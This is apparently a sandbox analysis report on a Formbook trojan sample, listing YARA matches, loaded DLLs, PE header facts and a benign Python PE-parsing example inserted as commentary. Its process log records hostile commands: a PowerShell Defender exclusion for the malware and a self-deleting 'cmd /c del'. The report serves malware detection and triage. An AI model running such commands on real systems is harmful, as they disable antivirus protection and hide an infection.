          Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
          Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: TEKL#U0130F #U0130ST.exe PID: 6148, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: TEKL#U0130F #U0130ST.exe PID: 4260, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: mstsc.exe PID: 3900, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: TEKL#U0130F #U0130ST.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, cCXDhPnYieu7sLXkQZ.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, cCXDhPnYieu7sLXkQZ.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, dAYBWvDDYYTIM9prkJ.cs | Security API names: _0020.SetAccessControl
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, dAYBWvDDYYTIM9prkJ.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, dAYBWvDDYYTIM9prkJ.cs | Security API names: _0020.AddAccessRule
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, dAYBWvDDYYTIM9prkJ.cs | Security API names: _0020.SetAccessControl
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, dAYBWvDDYYTIM9prkJ.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.TEKL#U0130F #U0130ST.exe.9080000.3.raw.unpack, dAYBWvDDYYTIM9prkJ.cs | Security API names: _0020.AddAccessRule
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@12/6@6/1
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_00813699 memset,memset,CreateThread,GetLastError,CloseHandle,LoadStringW,FormatMessageW,LoadStringW,MessageBoxW,LocalFree, 8_2_00813699
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_007E8051 GetModuleFileNameW,GetLastError,wcsrchr,GetCurrentProcessId,SysAllocString,SysAllocString,CoCreateInstance, 8_2_007E8051
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_008862D5 FindResourceExW,LoadResource, 8_2_008862D5
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TEKL#U0130F #U0130ST.exe.log
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1364:120:WilError_03
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqs2e3jc.x4i.ps1
          Source: TEKL#U0130F #U0130ST.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: TEKL#U0130F #U0130ST.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: TEKL#U0130F #U0130ST.exe | ReversingLabs: Detection: 34%
          Source: mstsc.exe | String found in binary or memory: unknown-client-address
          Source: unknown | Process created: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Process created: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"
          Source: C:\Windows\SysWOW64\mstsc.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Process created: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"
          Source: C:\Windows\SysWOW64\mstsc.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
          Source: C:\Windows\explorer.exe | Section loaded: windows.cloudstore.schema.shell.dll
          Source: C:\Windows\explorer.exe | Section loaded: mfsrcsnk.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll (2 identical entries)
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll (2 identical entries)
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: credui.dll
          Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: cryptui.dll
          Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: wininet.dll
          Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: version.dll
          Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: netapi32.dll
          Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: winmm.dll
          Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: ktmw32.dll
          Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: wkscli.dll
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: TEKL#U0130F #U0130ST.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: TEKL#U0130F #U0130ST.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: TEKL#U0130F #U0130ST.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
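The three "Static PE information" entries above come straight from the optional header: the DllCharacteristics bit field and the data directory table. The following is an added example, not part of the Joe Sandbox report, showing how to read those fields and reproduce the report's findings (DYNAMIC_BASE, NX_COMPAT, NO_SEH and TERMINAL_SERVER_AWARE set; a COM descriptor directory, which is the .NET runtime header; a debug directory). The header bytes it parses are a constructed minimal PE32 header, not the analysed binary; the flag values and directory indices are those of the PE specification.

```python
"""Parse the PE optional header fields a sandbox reports as "Static PE information".

Added example, not part of the Joe Sandbox report. The sample header built
by build_sample_header() is constructed to carry the same flags and
directories as the analysed file; it is not the file itself.
"""
import struct

# IMAGE_DLLCHARACTERISTICS_* bit values from the PE specification.
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
# IMAGE_DIRECTORY_ENTRY_* in table order; index 14 is the CLR (.NET) header.
DATA_DIRECTORIES = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
                    "DEBUG", "ARCHITECTURE", "GLOBALPTR", "TLS", "LOAD_CONFIG",
                    "BOUND_IMPORT", "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED"]


def parse_pe(data: bytes) -> dict:
    """Return machine, PE32/PE32+ flag, DllCharacteristics names and populated data directories."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, _nsect, _ts, _symtab, _nsyms, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:        # PE32: NumberOfRvaAndSizes at +92, directories at +96
        nrva_off, dirs_off = 92, 96
    elif magic == 0x20B:      # PE32+: 8-byte stack/heap fields push them to +108 / +112
        nrva_off, dirs_off = 108, 112
    else:
        raise ValueError("unknown optional header magic 0x%X" % magic)
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in both formats
    nrva = struct.unpack_from("<I", data, opt + nrva_off)[0]
    max_dirs = min(nrva, 16, (opt_size - dirs_off) // 8)      # never read past the header
    present = []
    for i in range(max_dirs):
        va, size = struct.unpack_from("<II", data, opt + dirs_off + 8 * i)
        if va and size:
            present.append(DATA_DIRECTORIES[i])
    return {
        "machine": machine,
        "pe32plus": magic == 0x20B,
        "dll_characteristics": [n for bit, n in sorted(DLL_CHARACTERISTICS.items()) if dll_chars & bit],
        "data_directories": present,
        "is_dotnet": "COM_DESCRIPTOR" in present,
    }


def build_sample_header() -> bytes:
    """Constructed minimal PE32 header (DOS stub + PE signature + COFF + optional header)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                      # e_lfanew: PE header right after DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, 3, 0, 0, 0, 224, 0x0102)  # i386, 3 sections, 224-byte opt hdr
    opt = bytearray(224)                                       # 96 fixed bytes + 16 directories * 8
    struct.pack_into("<H", opt, 0, 0x10B)                      # PE32 magic
    struct.pack_into("<H", opt, 68, 2)                         # Subsystem: WINDOWS_GUI
    struct.pack_into("<H", opt, 70, 0x0040 | 0x0100 | 0x0400 | 0x8000)  # flags seen in the report
    struct.pack_into("<I", opt, 92, 16)                        # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * 1, 0x2000, 0x4B)     # IMPORT
    struct.pack_into("<II", opt, 96 + 8 * 6, 0x2100, 0x1C)     # DEBUG
    struct.pack_into("<II", opt, 96 + 8 * 14, 0x2008, 0x48)    # COM_DESCRIPTOR (.NET)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    print(parse_pe(build_sample_header()))
```

NO_SEH on a .NET executable is unremarkable (managed code does not use SEH handler tables), and the COM descriptor is what makes the CLR load mscorrc.dll and query CLR CLSIDs as seen above; the interesting part for triage is the absence of the original .NET metadata in the later injected stages, which this parser would show as a plain native image.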
          Source: Binary string: rFP.pdb | source: TEKL#U0130F #U0130ST.exe
          Source: Binary string: wntdll.pdbUGP | source: TEKL#U0130F #U0130ST.exe, 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000008.00000003.1626136595.000000000498B000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000008.00000003.1624065031.00000000047D0000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb | source: TEKL#U0130F #U0130ST.exe, TEKL#U0130F #U0130ST.exe, 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000008.00000003.1626136595.000000000498B000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000008.00000003.1624065031.00000000047D0000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rFP.pdbSHA256 | source: TEKL#U0130F #U0130ST.exe
          Source: Binary string: mstsc.pdbGCTL | source: TEKL#U0130F #U0130ST.exe, 00000004.00000002.1625524944.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: mstsc.pdb | source: TEKL#U0130F #U0130ST.exe, 00000004.00000002.1625524944.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_0087B05F LoadLibraryW,GetProcAddress,memset,FreeLibrary
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 0_2_09102B10 push eax; retf 0_2_09102B11
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 0_2_09102512 push eax; retf 0_2_09102513
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 0_2_091027B3 push eax; retf 0_2_091027C2
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 0_2_091027EB push eax; retf 0_2_091027EC
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 0_2_0910268A push eax; retf 0_2_0910268B
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 0_2_091026E6 push eax; retf 0_2_091026E7
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_0041B863 push esi; iretd 4_2_0041B866
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_00416B15 push 560BADFBh; retf 4_2_00416B1A
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_0040E44C push fs; iretd 4_2_0040E453
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_0041D4D2 push eax; ret 4_2_0041D4D8
